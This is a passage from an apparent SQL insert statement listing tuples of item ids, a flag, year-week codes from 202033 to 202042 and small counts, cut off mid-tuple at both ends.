6),(2801,1,'202033',6),(2809,1,'202033',6),(3045,1,'202033',6),(3069,1,'202033',6),(473,1,'202033',7),(1596,1,'202033',7),(1610,1,'202033',7),(1718,1,'202033',7),(1730,1,'202033',7),(2609,1,'202033',7),(2658,1,'202033',7),(2989,1,'202033',7),(486,1,'202033',8),(1582,1,'202033',8),(1604,1,'202033',8),(1606,1,'202033',8),(2457,1,'202033',8),(3081,1,'202033',9),(3102,1,'202033',9),(3104,1,'202033',9),(2751,1,'202033',10),(3109,1,'202033',10),(2309,1,'202033',11),(1588,1,'202033',12),(3030,1,'202033',13),(1600,1,'202033',14),(2956,1,'202033',14),(1614,1,'202033',20),(478,1,'202034',1),(1768,1,'202034',1),(2748,1,'202034',1),(479,1,'202034',2),(487,1,'202034',2),(1590,1,'202034',2),(2704,1,'202034',2),(2911,1,'202034',2),(2965,1,'202034',2),(3038,1,'202034',2),(3066,1,'202034',2),(471,1,'202034',3),(472,1,'202034',3),(477,1,'202034',3),(482,1,'202034',3),(483,1,'202034',3),(484,1,'202034',3),(488,1,'202034',3),(1544,1,'202034',3),(1584,1,'202034',3),(1594,1,'202034',3),(1606,1,'202034',3),(1711,1,'202034',3),(1772,1,'202034',3),(2296,1,'202034',3),(2297,1,'202034',3),(2964,1,'202034',3),(3041,1,'202034',3),(476,1,'202034',4),(480,1,'202034',4),(1610,1,'202034',4),(1612,1,'202034',4),(1705,1,'202034',4),(1728,1,'202034',4),(1741,1,'202034',4),(1766,1,'202034',4),(2775,1,'202034',4),(2991,1,'202034',4),(3097,1,'202034',4),(3117,1,'202034',4),(467,1,'202034',5),(474,1,'202034',5),(485,1,'202034',5),(1592,1,'202034',5),(1602,1,'202034',5),(1699,1,'202034',5),(1724,1,'202034',5),(1745,1,'202034',5),(1747,1,'202034',5),(2150,1,'202034',5),(2154,1,'202034',5),(2293,1,'202034',5),(2658,1,'202034',5),(2804,1,'202034',5),(2809,1,'202034',5),(2993,1,'202034',5),(3004,1,'202034',5),(3005,1,'202034',5),(3027,1,'202034',5),(3030,1,'202034',5),(3034,1,'202034',5),(3063,1,'202034',5),(468,1,'202034',6),(469,1,'202034',6),(481,1,'202034',6),(1695,1,'202034',6),(1697,1,'202034',6),(1701,1,'202034',6),(1703,1,'202034',6),(1713,1,'202034',6),(1715,1,'202034',6),(1726,1,'202034',6),(1734,1,'202034',6),(1743,1,'202034',6),(1770,1,'202034',6),(1774,1,'202034',6),(1782,1,'202034',6),(2063,1,'202034',6),(2148,1,'202034',6),(2152,1,'202034',6),(2156,1,'202034',6),(2617,1,'202034',6),(2801,1,'202034',6),(2956,1,'202034',6),(3045,1,'202034',6),(3069,1,'202034',6),(3079,1,'202034',6),(3081,1,'202034',6),(3096,1,'202034',6),(486,1,'202034',7),(1608,1,'202034',7),(1707,1,'202034',7),(1730,1,'202034',7),(1732,1,'202034',7),(1737,1,'202034',7),(1749,1,'202034',7),(1778,1,'202034',7),(2159,1,'202034',7),(2178,1,'202034',7),(2813,1,'202034',7),(3006,1,'202034',7),(3072,1,'202034',7),(3087,1,'202034',7),(3090,1,'202034',7),(3092,1,'202034',7),(470,1,'202034',8),(1596,1,'202034',8),(1709,1,'202034',8),(1720,1,'202034',8),(1739,1,'202034',8),(2165,1,'202034',8),(3083,1,'202034',8),(1598,1,'202034',9),(1722,1,'202034',9),(1751,1,'202034',9),(2161,1,'202034',9),(2248,1,'202034',9),(473,1,'202034',10),(1718,1,'202034',10),(1780,1,'202034',10),(3107,1,'202034',10),(570,1,'202034',11),(1614,1,'202034',11),(1776,1,'202034',11),(2252,1,'202034',11),(3104,1,'202034',11),(1586,1,'202034',12),(1588,1,'202034',12),(2457,1,'202034',12),(3060,1,'202034',12),(3102,1,'202034',12),(1582,1,'202034',13),(2769,1,'202034',13),(2989,1,'202034',13),(3109,1,'202034',13),(1604,1,'202034',16),(2609,1,'202034',16),(2751,1,'202034',16),(2309,1,'202034',18),(1600,1,'202034',19),(483,1,'202035',2),(488,1,'202035',2),(1695,1,'202035',2),(1709,1,'202035',2),(2296,1,'202035',2),(2993,1,'202035',2),(3041,1,'202035',2),(467,1,'202035',3),(1584,1,'202035',3),(1606,1,'202035',3),(1608,1,'202035',3),(1612,1,'202035',3),(1697,1,'202035',3),(1711,1,'202035',3),(1776,1,'202035',3),(3066,1,'202035',3),(472,1,'202035',4),(476,1,'202035',4),(478,1,'202035',4),(479,1,'202035',4),(482,1,'202035',4),(1590,1,'202035',4),(1701,1,'202035',4),(1713,1,'202035',4),(1743,1,'202035',4),(1751,1,'202035',4),(1768,1,'202035',4),(2150,1,'202035',4),(2152,1,'202035',4),(2159,1,'202035',4),(2161,1,'202035',4),(2964,1,'202035',4),(3004,1,'202035',4),(3034,1,'202035',4),(3087,1,'202035',4),(471,1,'202035',5),(480,1,'202035',5),(481,1,'202035',5),(1544,1,'202035',5),(1610,1,'202035',5),(1720,1,'202035',5),(1732,1,'202035',5),(1737,1,'202035',5),(1741,1,'202035',5),(1747,1,'202035',5),(1772,1,'202035',5),(1778,1,'202035',5),(1780,1,'202035',5),(1782,1,'202035',5),(2178,1,'202035',5),(2248,1,'202035',5),(2252,1,'202035',5),(2293,1,'202035',5),(2558,1,'202035',5),(2704,1,'202035',5),(2748,1,'202035',5),(2804,1,'202035',5),(2965,1,'202035',5),(3005,1,'202035',5),(3060,1,'202035',5),(3079,1,'202035',5),(3096,1,'202035',5),(3097,1,'202035',5),(469,1,'202035',6),(487,1,'202035',6),(1598,1,'202035',6),(1705,1,'202035',6),(1722,1,'202035',6),(1724,1,'202035',6),(1749,1,'202035',6),(2148,1,'202035',6),(2297,1,'202035',6),(2809,1,'202035',6),(3027,1,'202035',6),(3038,1,'202035',6),(3045,1,'202035',6),(3072,1,'202035',6),(3092,1,'202035',6),(3107,1,'202035',6),(474,1,'202035',7),(484,1,'202035',7),(485,1,'202035',7),(1586,1,'202035',7),(1602,1,'202035',7),(1699,1,'202035',7),(1703,1,'202035',7),(1707,1,'202035',7),(1715,1,'202035',7),(1730,1,'202035',7),(1734,1,'202035',7),(1739,1,'202035',7),(1770,1,'202035',7),(1774,1,'202035',7),(2154,1,'202035',7),(2165,1,'202035',7),(2617,1,'202035',7),(2813,1,'202035',7),(2911,1,'202035',7),(2956,1,'202035',7),(3006,1,'202035',7),(3023,1,'202035',7),(3069,1,'202035',7),(3081,1,'202035',7),(3083,1,'202035',7),(3102,1,'202035',7),(470,1,'202035',8),(477,1,'202035',8),(570,1,'202035',8),(1592,1,'202035',8),(1594,1,'202035',8),(1596,1,'202035',8),(1718,1,'202035',8),(1728,1,'202035',8),(2457,1,'202035',8),(2991,1,'202035',8),(3030,1,'202035',8),(3104,1,'202035',8),(486,1,'202035',9),(2063,1,'202035',9),(2156,1,'202035',9),(2769,1,'202035',9),(2775,1,'202035',9),(2801,1,'202035',9),(2989,1,'202035',9),(3063,1,'202035',9),(3109,1,'202035',9),(468,1,'202035',10),(1726,1,'202035',10),(1766,1,'202035',10),(3090,1,'202035',10),(473,1,'202035',11),(1745,1,'202035',11),(3117,1,'202035',11),(2658,1,'202035',12),(3124,1,'202035',12),(1588,1,'202035',13),(2751,1,'202035',13),(1604,1,'202035',14),(2309,1,'202035',14),(2609,1,'202035',15),(1582,1,'202035',16),(1614,1,'202035',16),(3127,1,'202035',22),(1600,1,'202035',30),(472,1,'202036',1),(476,1,'202036',1),(479,1,'202036',1),(484,1,'202036',1),(1711,1,'202036',1),(3066,1,'202036',1),(478,1,'202036',2),(1705,1,'202036',2),(1741,1,'202036',2),(2965,1,'202036',2),(3041,1,'202036',2),(3072,1,'202036',2),(469,1,'202036',3),(471,1,'202036',3),(477,1,'202036',3),(480,1,'202036',3),(482,1,'202036',3),(487,1,'202036',3),(1703,1,'202036',3),(1726,1,'202036',3),(1747,1,'202036',3),(1749,1,'202036',3),(1768,1,'202036',3),(1770,1,'202036',3),(2178,1,'202036',3),(2704,1,'202036',3),(3023,1,'202036',3),(3063,1,'202036',3),(3096,1,'202036',3),(1544,1,'202036',4),(1602,1,'202036',4),(1695,1,'202036',4),(1697,1,'202036',4),(1751,1,'202036',4),(2156,1,'202036',4),(2248,1,'202036',4),(2558,1,'202036',4),(2809,1,'202036',4),(2956,1,'202036',4),(2964,1,'202036',4),(2993,1,'202036',4),(3038,1,'202036',4),(3060,1,'202036',4),(3083,1,'202036',4),(3087,1,'202036',4),(470,1,'202036',5),(483,1,'202036',5),(485,1,'202036',5),(488,1,'202036',5),(1592,1,'202036',5),(1699,1,'202036',5),(1707,1,'202036',5),(1709,1,'202036',5),(1715,1,'202036',5),(1720,1,'202036',5),(1722,1,'202036',5),(1737,1,'202036',5),(1739,1,'202036',5),(1743,1,'202036',5),(1774,1,'202036',5),(2150,1,'202036',5),(2152,1,'202036',5),(2154,1,'202036',5),(2161,1,'202036',5),(2293,1,'202036',5),(2804,1,'202036',5),(2911,1,'202036',5),(2991,1,'202036',5),(3006,1,'202036',5),(3092,1,'202036',5),(3097,1,'202036',5),(1584,1,'202036',6),(1590,1,'202036',6),(1608,1,'202036',6),(1612,1,'202036',6),(1724,1,'202036',6),(1728,1,'202036',6),(1732,1,'202036',6),(1734,1,'202036',6),(1745,1,'202036',6),(1772,1,'202036',6),(1780,1,'202036',6),(2063,1,'202036',6),(2148,1,'202036',6),(2252,1,'202036',6),(2296,1,'202036',6),(2748,1,'202036',6),(3004,1,'202036',6),(3027,1,'202036',6),(3045,1,'202036',6),(3079,1,'202036',6),(3081,1,'202036',6),(467,1,'202036',7),(481,1,'202036',7),(1610,1,'202036',7),(1701,1,'202036',7),(1766,1,'202036',7),(1782,1,'202036',7),(2165,1,'202036',7),(2297,1,'202036',7),(2813,1,'202036',7),(1778,1,'202036',8),(2658,1,'202036',8),(2769,1,'202036',8),(3030,1,'202036',8),(3069,1,'202036',8),(3124,1,'202036',8),(474,1,'202036',9),(486,1,'202036',9),(1606,1,'202036',9),(1776,1,'202036',9),(2617,1,'202036',9),(2801,1,'202036',9),(3005,1,'202036',9),(3117,1,'202036',9),(473,1,'202036',10),(1586,1,'202036',10),(1596,1,'202036',10),(1604,1,'202036',10),(1713,1,'202036',10),(2159,1,'202036',10),(2775,1,'202036',10),(3034,1,'202036',10),(3090,1,'202036',10),(3109,1,'202036',10),(468,1,'202036',11),(2989,1,'202036',11),(1598,1,'202036',12),(3102,1,'202036',12),(1718,1,'202036',13),(3104,1,'202036',13),(570,1,'202036',14),(2751,1,'202036',14),(1594,1,'202036',15),(1582,1,'202036',16),(1730,1,'202036',16),(2609,1,'202036',17),(3107,1,'202036',17),(1588,1,'202036',18),(1614,1,'202036',19),(3127,1,'202036',20),(2309,1,'202036',21),(2457,1,'202036',21),(1600,1,'202036',27),(1608,1,'202037',3),(1596,1,'202037',4),(1701,1,'202037',4),(1720,1,'202037',4),(1745,1,'202037',4),(3097,1,'202037',4),(476,1,'202037',5),(484,1,'202037',5),(488,1,'202037',5),(1584,1,'202037',5),(1695,1,'202037',5),(1709,1,'202037',5),(1715,1,'202037',5),(1734,1,'202037',5),(1741,1,'202037',5),(1749,1,'202037',5),(1782,1,'202037',5),(2964,1,'202037',5),(2965,1,'202037',5),(3023,1,'202037',5),(3041,1,'202037',5),(3124,1,'202037',5),(469,1,'202037',6),(483,1,'202037',6),(1705,1,'202037',6),(1711,1,'202037',6),(1728,1,'202037',6),(1747,1,'202037',6),(1774,1,'202037',6),(1780,1,'202037',6),(2148,1,'202037',6),(2178,1,'202037',6),(2296,1,'202037',6),(2704,1,'202037',6),(2769,1,'202037',6),(2809,1,'202037',6),(3006,1,'202037',6),(3063,1,'202037',6),(3087,1,'202037',6),(3092,1,'202037',6),(3117,1,'202037',6),(471,1,'202037',7),(472,1,'202037',7),(482,1,'202037',7),(1610,1,'202037',7),(1697,1,'202037',7),(1743,1,'202037',7),(1751,1,'202037',7),(1768,1,'202037',7),(2152,1,'202037',7),(2248,1,'202037',7),(2252,1,'202037',7),(2293,1,'202037',7),(2558,1,'202037',7),(2911,1,'202037',7),(2991,1,'202037',7),(3038,1,'202037',7),(3072,1,'202037',7),(3079,1,'202037',7),(3096,1,'202037',7),(3104,1,'202037',7),(467,1,'202037',8),(478,1,'202037',8),(480,1,'202037',8),(1544,1,'202037',8),(1590,1,'202037',8),(1602,1,'202037',8),(1612,1,'202037',8),(1699,1,'202037',8),(1707,1,'202037',8),(1730,1,'202037',8),(1732,1,'202037',8),(1737,1,'202037',8),(1772,1,'202037',8),(2063,1,'202037',8),(2150,1,'202037',8),(2154,1,'202037',8),(2156,1,'202037',8),(2159,1,'202037',8),(2775,1,'202037',8),(2956,1,'202037',8),(2993,1,'202037',8),(3090,1,'202037',8),(3109,1,'202037',8),(474,1,'202037',9),(479,1,'202037',9),(1713,1,'202037',9),(1739,1,'202037',9),(1766,1,'202037',9),(1770,1,'202037',9),(1778,1,'202037',9),(2297,1,'202037',9),(2804,1,'202037',9),(3027,1,'202037',9),(3066,1,'202037',9),(3083,1,'202037',9),(485,1,'202037',10),(1594,1,'202037',10),(1703,1,'202037',10),(1722,1,'202037',10),(2165,1,'202037',10),(2748,1,'202037',10),(2989,1,'202037',10),(3004,1,'202037',10),(3005,1,'202037',10),(3045,1,'202037',10),(3127,1,'202037',10),(477,1,'202037',11),(570,1,'202037',11),(1718,1,'202037',11),(1726,1,'202037',11),(1776,1,'202037',11),(2161,1,'202037',11),(2617,1,'202037',11),(2813,1,'202037',11),(468,1,'202037',12),(470,1,'202037',12),(473,1,'202037',12),(486,1,'202037',12),(487,1,'202037',12),(1582,1,'202037',12),(3060,1,'202037',12),(3102,1,'202037',12),(3107,1,'202037',12),(481,1,'202037',13),(1586,1,'202037',13),(1592,1,'202037',13),(1598,1,'202037',13),(3081,1,'202037',13),(2457,1,'202037',14),(3034,1,'202037',14),(3069,1,'202037',14),(1606,1,'202037',15),(2801,1,'202037',15),(1724,1,'202037',17),(2609,1,'202037',17),(2658,1,'202037',18),(2751,1,'202037',18),(1604,1,'202037',19),(3030,1,'202037',20),(1614,1,'202037',23),(1588,1,'202037',25),(2309,1,'202037',34),(1600,1,'202037',35),(484,1,'202038',5),(1741,1,'202038',5),(483,1,'202038',6),(1598,1,'202038',6),(1608,1,'202038',6),(1705,1,'202038',6),(2964,1,'202038',6),(3004,1,'202038',6),(3107,1,'202038',6),(3117,1,'202038',6),(485,1,'202038',7),(1610,1,'202038',7),(1697,1,'202038',7),(1703,1,'202038',7),(1715,1,'202038',7),(1728,1,'202038',7),(1730,1,'202038',7),(1734,1,'202038',7),(2165,1,'202038',7),(2558,1,'202038',7),(2911,1,'202038',7),(3034,1,'202038',7),(3060,1,'202038',7),(3063,1,'202038',7),(3124,1,'202038',7),(477,1,'202038',8),(479,1,'202038',8),(481,1,'202038',8),(1707,1,'202038',8),(1711,1,'202038',8),(1724,1,'202038',8),(1776,1,'202038',8),(2154,1,'202038',8),(2617,1,'202038',8),(2748,1,'202038',8),(3041,1,'202038',8),(3069,1,'202038',8),(3102,1,'202038',8),(472,1,'202038',9),(474,1,'202038',9),(482,1,'202038',9),(1584,1,'202038',9),(1588,1,'202038',9),(1590,1,'202038',9),(1592,1,'202038',9),(1612,1,'202038',9),(1699,1,'202038',9),(1737,1,'202038',9),(1747,1,'202038',9),(1751,1,'202038',9),(1766,1,'202038',9),(2150,1,'202038',9),(2156,1,'202038',9),(2296,1,'202038',9),(2813,1,'202038',9),(2965,1,'202038',9),(3006,1,'202038',9),(3045,1,'202038',9),(3079,1,'202038',9),(3087,1,'202038',9),(3090,1,'202038',9),(3104,1,'202038',9),(3109,1,'202038',9),(467,1,'202038',10),(470,1,'202038',10),(486,1,'202038',10),(1594,1,'202038',10),(1722,1,'202038',10),(1768,1,'202038',10),(2161,1,'202038',10),(2809,1,'202038',10),(2991,1,'202038',10),(3005,1,'202038',10),(3072,1,'202038',10),(3092,1,'202038',10),(3096,1,'202038',10),(480,1,'202038',11),(488,1,'202038',11),(1582,1,'202038',11),(1596,1,'202038',11),(1602,1,'202038',11),(1701,1,'202038',11),(1709,1,'202038',11),(1713,1,'202038',11),(1718,1,'202038',11),(1720,1,'202038',11),(1732,1,'202038',11),(1739,1,'202038',11),(1743,1,'202038',11),(1749,1,'202038',11),(1774,1,'202038',11),(1778,1,'202038',11),(1782,1,'202038',11),(2063,1,'202038',11),(2178,1,'202038',11),(2297,1,'202038',11),(2704,1,'202038',11),(2775,1,'202038',11),(2956,1,'202038',11),(2993,1,'202038',11),(3097,1,'202038',11),(469,1,'202038',12),(476,1,'202038',12),(478,1,'202038',12),(1544,1,'202038',12),(1695,1,'202038',12),(1726,1,'202038',12),(1770,1,'202038',12),(1780,1,'202038',12),(2148,1,'202038',12),(2804,1,'202038',12),(3030,1,'202038',12),(3038,1,'202038',12),(3081,1,'202038',12),(468,1,'202038',13),(471,1,'202038',13),(570,1,'202038',13),(1745,1,'202038',13),(2252,1,'202038',13),(2293,1,'202038',13),(2609,1,'202038',13),(2751,1,'202038',13),(2769,1,'202038',13),(3023,1,'202038',13),(3066,1,'202038',13),(473,1,'202038',14),(487,1,'202038',14),(1772,1,'202038',14),(2152,1,'202038',14),(2801,1,'202038',14),(2989,1,'202038',14),(2159,1,'202038',15),(2248,1,'202038',15),(3027,1,'202038',15),(3083,1,'202038',15),(1614,1,'202038',17),(2457,1,'202038',17),(2658,1,'202038',17),(3127,1,'202038',17),(1586,1,'202038',18),(1606,1,'202038',18),(1604,1,'202038',19),(2309,1,'202038',21),(1600,1,'202038',28),(1747,1,'202039',1),(2911,1,'202039',2),(2964,1,'202039',2),(472,1,'202039',3),(3072,1,'202039',3),(479,1,'202039',4),(482,1,'202039',4),(570,1,'202039',4),(1544,1,'202039',4),(1604,1,'202039',4),(1732,1,'202039',4),(1782,1,'202039',4),(2154,1,'202039',4),(2558,1,'202039',4),(3034,1,'202039',4),(3117,1,'202039',4),(468,1,'202039',5),(476,1,'202039',5),(484,1,'202039',5),(1697,1,'202039',5),(1701,1,'202039',5),(1715,1,'202039',5),(1724,1,'202039',5),(1739,1,'202039',5),(2161,1,'202039',5),(2252,1,'202039',5),(2617,1,'202039',5),(2956,1,'202039',5),(2993,1,'202039',5),(3092,1,'202039',5),(478,1,'202039',6),(485,1,'202039',6),(1718,1,'202039',6),(1728,1,'202039',6),(1768,1,'202039',6),(1776,1,'202039',6),(1780,1,'202039',6),(2063,1,'202039',6),(2150,1,'202039',6),(2156,1,'202039',6),(2297,1,'202039',6),(2991,1,'202039',6),(3023,1,'202039',6),(3096,1,'202039',6),(3102,1,'202039',6),(488,1,'202039',7),(1590,1,'202039',7),(1602,1,'202039',7),(1699,1,'202039',7),(1707,1,'202039',7),(1720,1,'202039',7),(1726,1,'202039',7),(1730,1,'202039',7),(1734,1,'202039',7),(1737,1,'202039',7),(1745,1,'202039',7),(1749,1,'202039',7),(1766,1,'202039',7),(1770,1,'202039',7),(2165,1,'202039',7),(2178,1,'202039',7),(2248,1,'202039',7),(2293,1,'202039',7),(2296,1,'202039',7),(2609,1,'202039',7),(2704,1,'202039',7),(2813,1,'202039',7),(2989,1,'202039',7),(3038,1,'202039',7),(3041,1,'202039',7),(3079,1,'202039',7),(3097,1,'202039',7),(3104,1,'202039',7),(3124,1,'202039',7),(467,1,'202039',8),(480,1,'202039',8),(481,1,'202039',8),(1596,1,'202039',8),(1598,1,'202039',8),(1703,1,'202039',8),(1741,1,'202039',8),(1751,1,'202039',8),(1772,1,'202039',8),(1774,1,'202039',8),(2152,1,'202039',8),(2159,1,'202039',8),(3005,1,'202039',8),(3027,1,'202039',8),(3063,1,'202039',8),(3066,1,'202039',8),(3083,1,'202039',8),(3127,1,'202039',8),(469,1,'202039',9),(486,1,'202039',9),(1584,1,'202039',9),(1610,1,'202039',9),(1705,1,'202039',9),(1709,1,'202039',9),(1722,1,'202039',9),(1743,1,'202039',9),(1778,1,'202039',9),(2457,1,'202039',9),(2748,1,'202039',9),(2804,1,'202039',9),(2965,1,'202039',9),(3004,1,'202039',9),(3081,1,'202039',9),(471,1,'202039',10),(473,1,'202039',10),(487,1,'202039',10),(1586,1,'202039',10),(1594,1,'202039',10),(1612,1,'202039',10),(2658,1,'202039',10),(2751,1,'202039',10),(2769,1,'202039',10),(3030,1,'202039',10),(3045,1,'202039',10),(3087,1,'202039',10),(3090,1,'202039',10),(3109,1,'202039',10),(470,1,'202039',11),(1695,1,'202039',11),(2775,1,'202039',11),(2801,1,'202039',11),(3006,1,'202039',11),(483,1,'202039',12),(1592,1,'202039',12),(1711,1,'202039',12),(1713,1,'202039',12),(2148,1,'202039',12),(2809,1,'202039',12),(3069,1,'202039',12),(474,1,'202039',13),(2309,1,'202039',13),(477,1,'202039',14),(1582,1,'202039',14),(1606,1,'202039',14),(1608,1,'202039',14),(3060,1,'202039',14),(3107,1,'202039',14),(1614,1,'202039',17),(1588,1,'202039',19),(1600,1,'202039',25),(2911,1,'202040',1),(3140,1,'202040',1),(3142,1,'202040',1),(3144,1,'202040',1),(3151,1,'202040',1),(482,1,'202040',2),(1697,1,'202040',3),(1715,1,'202040',3),(1720,1,'202040',3),(2704,1,'202040',3),(2964,1,'202040',3),(468,1,'202040',4),(479,1,'202040',4),(483,1,'202040',4),(485,1,'202040',4),(1612,1,'202040',4),(1705,1,'202040',4),(2993,1,'202040',4),(3004,1,'202040',4),(467,1,'202040',5),(478,1,'202040',5),(480,1,'202040',5),(1711,1,'202040',5),(1741,1,'202040',5),(2813,1,'202040',5),(3005,1,'202040',5),(3027,1,'202040',5),(476,1,'202040',6),(1722,1,'202040',6),(1726,1,'202040',6),(1730,1,'202040',6),(1732,1,'202040',6),(1778,1,'202040',6),(2154,1,'202040',6),(2178,1,'202040',6),(2293,1,'202040',6),(2748,1,'202040',6),(3030,1,'202040',6),(3079,1,'202040',6),(3087,1,'202040',6),(472,1,'202040',7),(481,1,'202040',7),(1602,1,'202040',7),(1610,1,'202040',7),(1709,1,'202040',7),(1724,1,'202040',7),(1728,1,'202040',7),(1734,1,'202040',7),(1766,1,'202040',7),(1774,1,'202040',7),(1776,1,'202040',7),(2775,1,'202040',7),(2804,1,'202040',7),(2809,1,'202040',7),(2965,1,'202040',7),(2991,1,'202040',7),(3081,1,'202040',7),(469,1,'202040',8),(1590,1,'202040',8),(1598,1,'202040',8),(1707,1,'202040',8),(1751,1,'202040',8),(2161,1,'202040',8),(2252,1,'202040',8),(2558,1,'202040',8),(2989,1,'202040',8),(3006,1,'202040',8),(3023,1,'202040',8),(3063,1,'202040',8),(3090,1,'202040',8),(3096,1,'202040',8),(3107,1,'202040',8),(3124,1,'202040',8),(470,1,'202040',9),(477,1,'202040',9),(488,1,'202040',9),(1703,1,'202040',9),(1743,1,'202040',9),(1745,1,'202040',9),(1747,1,'202040',9),(1772,1,'202040',9),(1780,1,'202040',9),(2150,1,'202040',9),(2152,1,'202040',9),(2156,1,'202040',9),(2297,1,'202040',9),(2769,1,'202040',9),(3045,1,'202040',9),(473,1,'202040',10),(487,1,'202040',10),(570,1,'202040',10),(1544,1,'202040',10),(1584,1,'202040',10),(1596,1,'202040',10),(1608,1,'202040',10),(1695,1,'202040',10),(1701,1,'202040',10),(1718,1,'202040',10),(1737,1,'202040',10),(1739,1,'202040',10),(2063,1,'202040',10),(2148,1,'202040',10),(2296,1,'202040',10),(2617,1,'202040',10),(2956,1,'202040',10),(3041,1,'202040',10),(3097,1,'202040',10),(3117,1,'202040',10),(474,1,'202040',11),(1588,1,'202040',11),(1614,1,'202040',11),(1699,1,'202040',11),(1713,1,'202040',11),(1749,1,'202040',11),(2248,1,'202040',11),(2801,1,'202040',11),(3066,1,'202040',11),(3104,1,'202040',11),(471,1,'202040',12),(486,1,'202040',12),(1592,1,'202040',12),(1594,1,'202040',12),(1770,1,'202040',12),(3072,1,'202040',12),(2165,1,'202040',13),(3034,1,'202040',13),(3038,1,'202040',13),(3083,1,'202040',13),(3092,1,'202040',13),(1768,1,'202040',14),(1782,1,'202040',14),(2159,1,'202040',14),(2751,1,'202040',14),(3127,1,'202040',14),(1582,1,'202040',15),(1606,1,'202040',15),(3109,1,'202040',15),(484,1,'202040',16),(2457,1,'202040',16),(1586,1,'202040',17),(1604,1,'202040',17),(2658,1,'202040',17),(3102,1,'202040',17),(2609,1,'202040',18),(2309,1,'202040',20),(3060,1,'202040',20),(1600,1,'202040',24),(3069,1,'202040',24),(476,1,'202041',4),(1602,1,'202041',4),(3081,1,'202041',4),(480,1,'202041',5),(1722,1,'202041',5),(2775,1,'202041',5),(3045,1,'202041',5),(3066,1,'202041',5),(3072,1,'202041',5),(467,1,'202041',6),(479,1,'202041',6),(485,1,'202041',6),(1715,1,'202041',6),(1730,1,'202041',6),(1751,1,'202041',6),(2150,1,'202041',6),(2152,1,'202041',6),(2965,1,'202041',6),(3027,1,'202041',6),(3083,1,'202041',6),(3092,1,'202041',6),(478,1,'202041',7),(482,1,'202041',7),(1590,1,'202041',7),(1610,1,'202041',7),(1612,1,'202041',7),(1697,1,'202041',7),(1699,1,'202041',7),(1709,1,'202041',7),(2178,1,'202041',7),(2248,1,'202041',7),(2964,1,'202041',7),(3004,1,'202041',7),(3005,1,'202041',7),(3023,1,'202041',7),(3041,1,'202041',7),(3063,1,'202041',7),(469,1,'202041',8),(481,1,'202041',8),(483,1,'202041',8),(1544,1,'202041',8),(1703,1,'202041',8),(1728,1,'202041',8),(1734,1,'202041',8),(1739,1,'202041',8),(1741,1,'202041',8),(1772,1,'202041',8),(1778,1,'202041',8),(2161,1,'202041',8),(2252,1,'202041',8),(2457,1,'202041',8),(2558,1,'202041',8),(2769,1,'202041',8),(2804,1,'202041',8),(3030,1,'202041',8),(3090,1,'202041',8),(468,1,'202041',9),(472,1,'202041',9),(477,1,'202041',9),(486,1,'202041',9),(570,1,'202041',9),(1596,1,'202041',9),(1608,1,'202041',9),(1707,1,'202041',9),(1776,1,'202041',9),(1780,1,'202041',9),(1782,1,'202041',9),(2148,1,'202041',9),(2154,1,'202041',9),(2297,1,'202041',9),(2617,1,'202041',9),(2704,1,'202041',9),(2748,1,'202041',9),(2813,1,'202041',9),(1592,1,'202041',10),(1695,1,'202041',10),(1713,1,'202041',10),(1720,1,'202041',10),(1774,1,'202041',10),(2063,1,'202041',10),(2293,1,'202041',10),(2296,1,'202041',10),(2751,1,'202041',10),(2801,1,'202041',10),(2809,1,'202041',10),(2911,1,'202041',10),(2989,1,'202041',10),(3060,1,'202041',10),(3079,1,'202041',10),(3097,1,'202041',10),(3104,1,'202041',10),(3117,1,'202041',10),(3127,1,'202041',10),(487,1,'202041',11),(1701,1,'202041',11),(1718,1,'202041',11),(1726,1,'202041',11),(1745,1,'202041',11),(1747,1,'202041',11),(1766,1,'202041',11),(2993,1,'202041',11),(3006,1,'202041',11),(3087,1,'202041',11),(470,1,'202041',12),(473,1,'202041',12),(484,1,'202041',12),(488,1,'202041',12),(1705,1,'202041',12),(1724,1,'202041',12),(1737,1,'202041',12),(1743,1,'202041',12),(1768,1,'202041',12),(1770,1,'202041',12),(2165,1,'202041',12),(3038,1,'202041',12),(3096,1,'202041',12),(3102,1,'202041',12),(3124,1,'202041',12),(474,1,'202041',13),(1582,1,'202041',13),(1584,1,'202041',13),(1594,1,'202041',13),(1598,1,'202041',13),(1606,1,'202041',13),(1749,1,'202041',13),(2156,1,'202041',13),(2159,1,'202041',13),(2991,1,'202041',13),(3034,1,'202041',13),(471,1,'202041',14),(1711,1,'202041',14),(1732,1,'202041',14),(2956,1,'202041',14),(3107,1,'202041',14),(1586,1,'202041',15),(3109,1,'202041',15),(2609,1,'202041',17),(2658,1,'202041',18),(1588,1,'202041',19),(3069,1,'202041',19),(1604,1,'202041',20),(1614,1,'202041',23),(2309,1,'202041',27),(1600,1,'202041',34),(1741,1,'202042',3),(2558,1,'202042',3),(2809,1,'202042',3),(3034,1,'202042',3),(1602,1,'202042',4),(1747,1,'202042',4),(1749,1,'202042',4),(1780,1,'202042',4),(2063,1,'202042',4),(2148,1,'202042',4),(1722,1,'202042',5),(1745,1,'202042',5),(1770,1,'202042',5),(2964,1,'202042',5),(3023,1,'202042',5),(3107,1,'202042',5),(482,1,'202042',6),(485,1,'202042',6),(486,1,'202042',6),(1697,1,'202042',6),(1699,1,'202042',6),(1726,1,'202042',6),(1728,1,'202042',6),(1739,1,'202042',6),(1772,1,'202042',6),(1774,1,'202042',6),(1778,1,'202042',6),(1782,1,'202042',6),(2154,1,'202042',6),(2252,1,'202042',6),(2991,1,'202042',6),(3006,1,'202042',6),(3038,1,'202042',6),(3063,1,'202042',6),(469,1,'202042',7),(477,1,'202042',7),(479,1,'202042',7),(480,1,'202042',7),(484,1,'202042',7),(1544,1,'202042',7),(1592,1,'202042',7),(1608,1,'202042',7),(1612,1,'202042',7),(1705,1,'202042',7),(1707,1,'202042',7),(1709,1,'202042',7),(1711,1,'202042',7),(1715,1,'202042',7),(1734,1,'202042',7),(1751,1,'202042',7),(1776,1,'202042',7),(2152,1,'202042',7),(2159,1,'202042',7),(2293,1,'202042',7),(2748,1,'202042',7),(2804,1,'202042',7),(2911,1,'202042',7),(2993,1,'202042',7),(3041,1,'202042',7),(3083,1,'202042',7),(3109,1,'202042',7),(472,1,'202042',8),(481,1,'202042',8),(1584,1,'202042',8),(1590,1,'202042',8),(1596,1,'202042',8),(1598,1,'202042',8),(1610,1,'202042',8),(1701,1,'202042',8),(1720,1,'202042',8),(1730,1,'202042',8),(1743,1,'202042',8),(1766,1,'202042',8),(2297,1,'202042',8),(2775,1,'202042',8),(3045,1,'202042',8),(3092,1,'202042',8),(3096,1,'202042',8),(3124,1,'202042',8),(3127,1,'202042',8),(476,1,'202042',9),(483,1,'202042',9),(1594,1,'202042',9),(1695,1,'202042',9),(1718,1,'202042',9),(1732,1,'20